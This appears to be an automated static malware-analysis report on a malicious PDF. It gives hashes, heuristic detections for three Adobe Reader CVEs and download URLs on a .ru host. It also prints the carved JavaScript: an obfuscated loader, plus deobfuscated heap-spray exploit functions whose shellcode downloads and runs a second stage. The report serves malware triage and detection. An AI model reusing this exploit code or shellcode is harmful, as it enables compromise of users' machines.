Malicious PDF — malware analysis report

Static analysis result for SHA-256 7667a002d58fae15…

MALICIOUS

PDF

292.8 KB
MD5: ff7640cdf54581ac9fc21b36f0851a26
SHA-1: 7a0df4a574b0c1b1ab88066b9c1ece87b6fa5ae6
SHA-256: 7667a002d58fae159b97151c2436a011bb671fe407ebff2eb52b2ea08c34241d
Risk Score: 578

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple CVEs in Adobe Reader, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript attempts to download a second-stage payload from the URL http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N. This indicates a multi-stage attack aimed at executing arbitrary code on the victim's machine.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 13

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=printf& Referenced by PDF JavaScript
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=email& Referenced by PDF JavaScript
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=gicon& Referenced by PDF JavaScript
    • http://sucipdns.ru/fjMbP4Rm6MkLl3S14d2npgxARjn8IT8N?p&x=i813&&s=newp& Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js | pdf-javascript-stream | PDF /JS object 8 at offset 0x1CE | 99672 bytes
6e2b404eb6ad3e3750ab3bf0e042ce7edd0589e8f5b8815800074e42502d9f5f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var xxxxxxxxxxxxxxxxxxxxx = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var sss=event;
var ddd=this;
var fff=/TTZZ/ig;
var sfc=String.fromCharCode;
 function qODWlAGQDD1(ByVquSDCvM6) {
     var bEIyjMHkmz2 = "";
     var VhpwwNHdIE31, VhpwwNHdIE32, VhpwwNHdIE33 = "";
     var xzSAVEAcUD41, xzSAVEAcUD42, xzSAVEAcUD43, xzSAVEAcUD44 = "";
     var i = 0;
     var fwInusACcn5 = /[^A-Za-z0-9\+\/\=]/g;
     if (fwInusACcn5["ex"+"ec"](ByVquSDCvM6)) {}
     ByVquSDCvM6 = ByVquSDCvM6.replace(/[^A-Za-z0-9\+\/\=]/g, "");
     do {
        xzSAVEAcUD41 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        xzSAVEAcUD42 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        xzSAVEAcUD43 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        xzSAVEAcUD44 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](ByVquSDCvM6.charAt(i++));
        VhpwwNHdIE31 = (xzSAVEAcUD41 << 2) | (xzSAVEAcUD42 >> 4);
        VhpwwNHdIE32 = ((xzSAVEAcUD42 & 15) << 4) | (xzSAVEAcUD43 >> 2);
        VhpwwNHdIE33 = ((xzSAVEAcUD43 & 3) << 6) | xzSAVEAcUD44;
        bEIyjMHkmz2 = bEIyjMHkmz2 + sfc(VhpwwNHdIE31);
        if (xzSAVEAcUD43 != 63+1) {
           bEIyjMHkmz2 = bEIyjMHkmz2 + sfc(VhpwwNHdIE32);
        }
        if (xzSAVEAcUD44 != 63+1) {
           bEIyjMHkmz2 = bEIyjMHkmz2 + sfc(VhpwwNHdIE33);
        }
        VhpwwNHdIE31 = VhpwwNHdIE32 = VhpwwNHdIE33 = "";
        xzSAVEAcUD41 = xzSAVEAcUD42 = xzSAVEAcUD43 = xzSAVEAcUD44 = "";
     } while (i < ByVquSDCvM6.length);
     return bEIyjMHkmz2;
  }


var ggg="itPa";
var cadka = sss[qODWlAGQDD1("d*&*&*G*&*&*F*&*&*y*&*&*Z*&*&*2*&*&*V*&*&*0*&*&*")];
cadka[qODWlAGQDD1("e*&*&*m*&*&*9*&*&*v*&*&*b*&*&*V*&*&*R*&*&*5*&*&*c*&*&*G*&*&*U*&*&*=*&*&*")] = "F"+ggg+"ge";
... (truncated)
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery base64-literal-then-strip-TTZZ from JavaScript object 8 at offset 0x1CE | 6524 bytes
e493526364c74aaa0090c99e404bf18ad95dbbc504a2231ae779ca8ec114eeaf
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}

function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u7270%u6E69%u6674%u0026%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("%45000f", num);
}

function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6D65%u6961%u266C%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}


function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6967%u6F63%u266E%u9000");
var hWq500CN = vv
... (truncated)
generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery percent-decode from JavaScript object 8 at offset 0x1CE | 6520 bytes
bbdd7997c96bbd724552a770462e7420ee49a14ed09c31cf0821132688ea5178
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}

function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u7270%u6E69%u6674%u0026%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("E000f", num);
}

function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6D65%u6961%u266C%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}


function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6375%u7069%u6E64%u2E73%u7572%u662F%u4D6A%u5062%u5234%u366D%u6B4D%u6C4C%u5333%u3431%u3264%u706E%u7867%u5241%u6E6A%u4938%u3854%u3F4E%u2670%u3D78%u3869%u3331%u2626%u3D73%u6967%u6F63%u266E%u9000");
var hWq500CN = vvpe
... (truncated)